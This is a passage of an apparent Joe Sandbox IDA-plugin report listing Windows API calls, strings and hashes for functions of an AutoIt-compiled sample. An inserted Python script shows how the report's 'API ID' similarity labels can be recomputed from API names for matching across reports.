                                                  • Instruction Fuzzy Hash: 99A1BF72008B11AFD7209F64DC48E5E7BAAFF49330F101A19F962A61E0D771E956CF52
                                                  APIs
                                                  • DestroyWindow.USER32(?,?), ref: 005A8E14
                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 005E6AC5
                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 005E6AFE
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 005E6F43
                                                    • Part of subcall function 005A8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005A8BE8,?,00000000,?,?,?,?,005A8BBA,00000000,?), ref: 005A8FC5
                                                  • SendMessageW.USER32(?,00001053), ref: 005E6F7F
                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 005E6F96
                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 005E6FAC
                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 005E6FB7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                  • String ID: 0
                                                  • API String ID: 2760611726-4108050209
                                                  • Opcode ID: 432fa6f82aa50c9b0a14e937475a22ada1ac43aeb0fae333b6d1e8b3febcb3ba
                                                  • Instruction ID: ff601d941db018b4529de4a8a9d9dc00996729bad67341e54eeffd3809696c0d
                                                  • Opcode Fuzzy Hash: 432fa6f82aa50c9b0a14e937475a22ada1ac43aeb0fae333b6d1e8b3febcb3ba
                                                  • Instruction Fuzzy Hash: 1112AF30200681DFD729CF15C858BBABFEAFB65390F184569E4998B261CB31EC52CF51
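The "API ID" printed under Similarity for each of these entries (for example "DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove" just above, or "Window$Global$CreateRect$File$..." for the splash-image function at 00612B30) is a label derived from the function's API list rather than from its bytes, which makes it a convenient key for relating the same AutoIt runtime helper across reports of different AutoIt-compiled samples. The script below is an added example, not Joe Sandbox code: the rule it implements (split each API name into CamelCase words, keep "Name_" prefixes such as "ImageList_" as one word, drop words shorter than four characters, count, group by descending count, sort each group alphabetically, join groups with "$") was fitted to the entries in this section and reproduces every printed API ID here, but the four-character cutoff and the CamelCase splitter are assumptions, and the numeric "API String ID" hash is not reproduced. The sample entries embedded in the script are copied from the function at 005A8E14 above and from the drive-type function at 00604AED below.

```python
"""Recompute the Joe Sandbox "API ID" shown under Similarity for a function entry.

Added example; the rule is reverse-engineered from the entries in this report
and is not Joe Sandbox's own code. Observed rule: take every API name in the
APIs list (including "Part of subcall function" lines), split it into CamelCase
words, drop words shorter than four characters (Get, Set, Sys, Bk, Ex, W, DC,
Ole, Pen, Pos never appear in the printed IDs), count the remaining words,
group by descending count, sort each group alphabetically, concatenate the
words of a group and join the groups with "$".
"""
import re
from collections import Counter

# One API line of a report entry, with or without the subcall prefix, e.g.
#   • DeleteObject.GDI32(00000000), ref: 00612B30
#   • Part of subcall function 005A8F62: InvalidateRect.USER32(?), ref: 005A8FC5
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
)

# CamelCase splitter. A "Name_" chunk (ImageList_Destroy) is kept as one word
# because the report prints "ImageList_" as a single word.
WORD = re.compile(r"[A-Za-z]+_|[A-Z]+(?![a-z])|[A-Z][a-z]+")

MIN_WORD_LEN = 4  # assumption fitted to this report: "Pos"/"Sys"/"DC" vanish, "Rect"/"Caps" stay


def api_names(entry_text: str) -> list[str]:
    """API names listed in one function entry, in report order (subcalls included)."""
    return [m.group("api") for m in map(API_LINE.match, entry_text.splitlines()) if m]


def words(api: str) -> list[str]:
    """CamelCase words of one API name that survive the length cutoff."""
    return [w for w in WORD.findall(api) if len(w) >= MIN_WORD_LEN]


def api_id(names: list[str]) -> str:
    """Build the "$"-separated label from the API names of one function."""
    counts = Counter(w for name in names for w in words(name))
    groups: dict[int, list[str]] = {}
    for w, c in counts.items():
        groups.setdefault(c, []).append(w)
    return "$".join("".join(sorted(groups[c])) for c in sorted(groups, reverse=True))


# Constructed input: the APIs list of the function at 005A8E14 in this report.
LISTVIEW_ENTRY = r"""
• DestroyWindow.USER32(?,?), ref: 005A8E14
• SendMessageW.USER32(?,00001308,?,00000000), ref: 005E6AC5
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 005E6AFE
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 005E6F43
  • Part of subcall function 005A8F62: InvalidateRect.USER32(?,00000000,00000001,?), ref: 005A8FC5
• SendMessageW.USER32(?,00001053), ref: 005E6F7F
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 005E6F96
• ImageList_Destroy.COMCTL32(00000000,?), ref: 005E6FAC
• ImageList_Destroy.COMCTL32(00000000,?), ref: 005E6FB7
"""

# Constructed input: the APIs list of the drive-type function at 00604AED.
DRIVE_TYPE_ENTRY = r"""
• SetErrorMode.KERNEL32(00000001), ref: 00604AED
• GetDriveTypeW.KERNEL32(?,0062CB68,?,\\.\,0062CC08), ref: 00604BCA
• SetErrorMode.KERNEL32(00000000,0062CB68,?,\\.\,0062CC08), ref: 00604D36
"""


def demo() -> dict[str, str]:
    """Recompute the labels for the two embedded entries."""
    return {
        "005A8E14": api_id(api_names(LISTVIEW_ENTRY)),
        "00604AED": api_id(api_names(DRIVE_TYPE_ENTRY)),
    }


if __name__ == "__main__":
    for func, label in demo().items():
        print(f"{func}: {label}")
```

Paste the APIs block of any entry into api_names() and compare api_id() with the report's value; a mismatch means the entry uses a name shape the fitted rule does not cover (names starting in lower case such as lstrlenW would lose their first word with this splitter), so treat the cutoff and splitter as heuristics and re-check them against a few more entries before relying on the recomputed label for cross-report matching.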
                                                  APIs
                                                  • DestroyWindow.USER32(00000000), ref: 0061273E
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0061286A
                                                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 006128A9
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 006128B9
                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00612900
                                                  • GetClientRect.USER32(00000000,?), ref: 0061290C
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00612955
                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00612964
                                                  • GetStockObject.GDI32(00000011), ref: 00612974
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00612978
                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00612988
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00612991
                                                  • DeleteDC.GDI32(00000000), ref: 0061299A
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006129C6
                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 006129DD
                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00612A1D
                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00612A31
                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00612A42
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00612A77
                                                  • GetStockObject.GDI32(00000011), ref: 00612A82
                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00612A8D
                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00612A97
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                  • API String ID: 2910397461-517079104
                                                  • Opcode ID: a9b89cdb6176f2fcf67d94cbd59b0d9d925ba31d893bbdea3b0554006ea72fbb
                                                  • Instruction ID: 900a16bc82137f15c4af8547cf096d939c7d2ae0427a59a9b7845e33138afa87
                                                  • Opcode Fuzzy Hash: a9b89cdb6176f2fcf67d94cbd59b0d9d925ba31d893bbdea3b0554006ea72fbb
                                                  • Instruction Fuzzy Hash: 83B16D71A00615AFEB24DF68DC4AEAE7BAAFB49710F044115F915EB2A0D770ED40CB94
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00604AED
                                                  • GetDriveTypeW.KERNEL32(?,0062CB68,?,\\.\,0062CC08), ref: 00604BCA
                                                  • SetErrorMode.KERNEL32(00000000,0062CB68,?,\\.\,0062CC08), ref: 00604D36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DriveType
                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                  • API String ID: 2907320926-4222207086
                                                  • Opcode ID: f739ada4d4921bb57186795b1ae2c770c64578fa85103e9ec689df9db0c48b8a
                                                  • Instruction ID: 4c35ffa207cb9fa44e1e68043d5dfb4903a04b755bf79fa2c693af108a380d8d
                                                  • Opcode Fuzzy Hash: f739ada4d4921bb57186795b1ae2c770c64578fa85103e9ec689df9db0c48b8a
                                                  • Instruction Fuzzy Hash: 0461D0B02C2106EBDB28DF14CA869AE7BB3AF44301F644515FA06AB2D1DF31DD46DB41
                                                  APIs
                                                  • GetSysColor.USER32(00000012), ref: 00627421
                                                  • SetTextColor.GDI32(?,?), ref: 00627425
                                                  • GetSysColorBrush.USER32(0000000F), ref: 0062743B
                                                  • GetSysColor.USER32(0000000F), ref: 00627446
                                                  • CreateSolidBrush.GDI32(?), ref: 0062744B
                                                  • GetSysColor.USER32(00000011), ref: 00627463
                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00627471
                                                  • SelectObject.GDI32(?,00000000), ref: 00627482
                                                  • SetBkColor.GDI32(?,00000000), ref: 0062748B
                                                  • SelectObject.GDI32(?,?), ref: 00627498
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 006274B7
                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006274CE
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 006274DB
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0062752A
                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00627554
                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00627572
                                                  • DrawFocusRect.USER32(?,?), ref: 0062757D
                                                  • GetSysColor.USER32(00000011), ref: 0062758E
                                                  • SetTextColor.GDI32(?,00000000), ref: 00627596
                                                  • DrawTextW.USER32(?,006270F5,000000FF,?,00000000), ref: 006275A8
                                                  • SelectObject.GDI32(?,?), ref: 006275BF
                                                  • DeleteObject.GDI32(?), ref: 006275CA
                                                  • SelectObject.GDI32(?,?), ref: 006275D0
                                                  • DeleteObject.GDI32(?), ref: 006275D5
                                                  • SetTextColor.GDI32(?,?), ref: 006275DB
                                                  • SetBkColor.GDI32(?,?), ref: 006275E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 1996641542-0
                                                  • Opcode ID: e3013951188191bc2aad14d37a51956ed021aa6e3a048d662209a1962a9da4ad
                                                  • Instruction ID: 43610fd65f9191adc2d5c82e50f8dd933e519b8166eb4c92a5e39584270e6240
                                                  • Opcode Fuzzy Hash: e3013951188191bc2aad14d37a51956ed021aa6e3a048d662209a1962a9da4ad
                                                  • Instruction Fuzzy Hash: B7617C72900A28AFDB109FA4DC49EEEBFBAEF09320F105111F911BB2A1D7709951DF90
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00621128
                                                  • GetDesktopWindow.USER32 ref: 0062113D
                                                  • GetWindowRect.USER32(00000000), ref: 00621144
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00621199
                                                  • DestroyWindow.USER32(?), ref: 006211B9
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006211ED
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0062120B
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0062121D
                                                  • SendMessageW.USER32(00000000,00000421,?,?), ref: 00621232
                                                  • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00621245
                                                  • IsWindowVisible.USER32(00000000), ref: 006212A1
                                                  • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 006212BC
                                                  • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 006212D0
                                                  • GetWindowRect.USER32(00000000,?), ref: 006212E8
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 0062130E
                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00621328
                                                  • CopyRect.USER32(?,?), ref: 0062133F
                                                  • SendMessageW.USER32(00000000,00000412,00000000), ref: 006213AA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                  • String ID: ($0$tooltips_class32
                                                  • API String ID: 698492251-4156429822
                                                  • Opcode ID: 69c5ed0f08bc7dd3f29d28d5cf4c1c0b70fd2a45f126bf2168762b11d903a7f0
                                                  • Instruction ID: e1b00e2a59a4f4aa97fe443e3313554ddf3e255c9e36594d7f01d6cd2f179f5a
                                                  • Opcode Fuzzy Hash: 69c5ed0f08bc7dd3f29d28d5cf4c1c0b70fd2a45f126bf2168762b11d903a7f0
                                                  • Instruction Fuzzy Hash: 9DB19D71608751AFDB10DF24D888BAEBBE6FF99350F008918F9999B261CB31D845CF91
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005A8968
                                                  • GetSystemMetrics.USER32(00000007), ref: 005A8970
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005A899B
                                                  • GetSystemMetrics.USER32(00000008), ref: 005A89A3
                                                  • GetSystemMetrics.USER32(00000004), ref: 005A89C8
                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005A89E5
                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 005A89F5
                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 005A8A28
                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 005A8A3C
                                                  • GetClientRect.USER32(00000000,000000FF), ref: 005A8A5A
                                                  • GetStockObject.GDI32(00000011), ref: 005A8A76
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 005A8A81
                                                    • Part of subcall function 005A912D: GetCursorPos.USER32(?), ref: 005A9141
                                                    • Part of subcall function 005A912D: ScreenToClient.USER32(00000000,?), ref: 005A915E
                                                    • Part of subcall function 005A912D: GetAsyncKeyState.USER32(00000001), ref: 005A9183
                                                    • Part of subcall function 005A912D: GetAsyncKeyState.USER32(00000002), ref: 005A919D
                                                  • SetTimer.USER32(00000000,00000000,00000028,005A90FC), ref: 005A8AA8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                  • String ID: AutoIt v3 GUI
                                                  • API String ID: 1458621304-248962490
                                                  • Opcode ID: 1e358c90a473c7d783b78e0a534d42a32c3307be30309d3efac07892e39716ba
                                                  • Instruction ID: f3afa1aa87ab527282bbea4d446022e0b505cb268354058b50ae4f33bffe86d0
                                                  • Opcode Fuzzy Hash: 1e358c90a473c7d783b78e0a534d42a32c3307be30309d3efac07892e39716ba
                                                  • Instruction Fuzzy Hash: 53B15D71A0020A9FDB14DFA8CC49BAE3BB6FB49354F144229FA15EB290DB74E851CB51
                                                  APIs
                                                    • Part of subcall function 005F10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 005F1114
                                                    • Part of subcall function 005F10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1120
                                                    • Part of subcall function 005F10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F112F
                                                    • Part of subcall function 005F10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1136
                                                    • Part of subcall function 005F10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 005F114D
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 005F0DF5
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005F0E29
                                                  • GetLengthSid.ADVAPI32(?), ref: 005F0E40
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 005F0E7A
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005F0E96
                                                  • GetLengthSid.ADVAPI32(?), ref: 005F0EAD
                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 005F0EB5
                                                  • HeapAlloc.KERNEL32(00000000), ref: 005F0EBC
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 005F0EDD
                                                  • CopySid.ADVAPI32(00000000), ref: 005F0EE4
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 005F0F13
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005F0F35
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 005F0F47
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0F6E
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0F75
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0F7E
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0F85
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0F8E
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0F95
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 005F0FA1
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0FA8
                                                    • Part of subcall function 005F1193: GetProcessHeap.KERNEL32(00000008,005F0BB1,?,00000000,?,005F0BB1,?), ref: 005F11A1
                                                    • Part of subcall function 005F1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,005F0BB1,?), ref: 005F11A8
                                                    • Part of subcall function 005F1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,005F0BB1,?), ref: 005F11B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                  • String ID:
                                                  • API String ID: 4175595110-0
                                                  • Opcode ID: 1b45ad112029b764290fbb4710e5bac9a3823a38104dd231babef8b953343ba2
                                                  • Instruction ID: 034d50e98f4c10d9a9e5f21b8de67feeafee9b666ff04490e6046d8e464ab63f
                                                  • Opcode Fuzzy Hash: 1b45ad112029b764290fbb4710e5bac9a3823a38104dd231babef8b953343ba2
                                                  • Instruction Fuzzy Hash: 29715C7290060AEBDF209FA4DC49FBEBBB9BF04310F185115FA19E6192D7359A16CB60
                                                  APIs
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061C4BD
                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0062CC08,00000000,?,00000000,?,?), ref: 0061C544
                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0061C5A4
                                                  • _wcslen.LIBCMT ref: 0061C5F4
                                                  • _wcslen.LIBCMT ref: 0061C66F
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0061C6B2
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0061C7C1
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0061C84D
                                                  • RegCloseKey.ADVAPI32(?), ref: 0061C881
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0061C88E
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0061C960
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                  • API String ID: 9721498-966354055
                                                  • Opcode ID: 0cef7e27ca62b02b766d2e21e02a9b11518dd952437fa4acb3a9aefc3ac718e4
                                                  • Instruction ID: 7fe58bf80a590e68760c5a2bc4dd5b0d95fcdaa6d9d294eebc42bd35e6809dce
                                                  • Opcode Fuzzy Hash: 0cef7e27ca62b02b766d2e21e02a9b11518dd952437fa4acb3a9aefc3ac718e4
                                                  • Instruction Fuzzy Hash: 2D125D356042019FDB14DF14C895A6EBBE6FF88724F19885DF84A9B3A2DB31ED41CB81
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 006209C6
                                                  • _wcslen.LIBCMT ref: 00620A01
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00620A54
                                                  • _wcslen.LIBCMT ref: 00620A8A
                                                  • _wcslen.LIBCMT ref: 00620B06
                                                  • _wcslen.LIBCMT ref: 00620B81
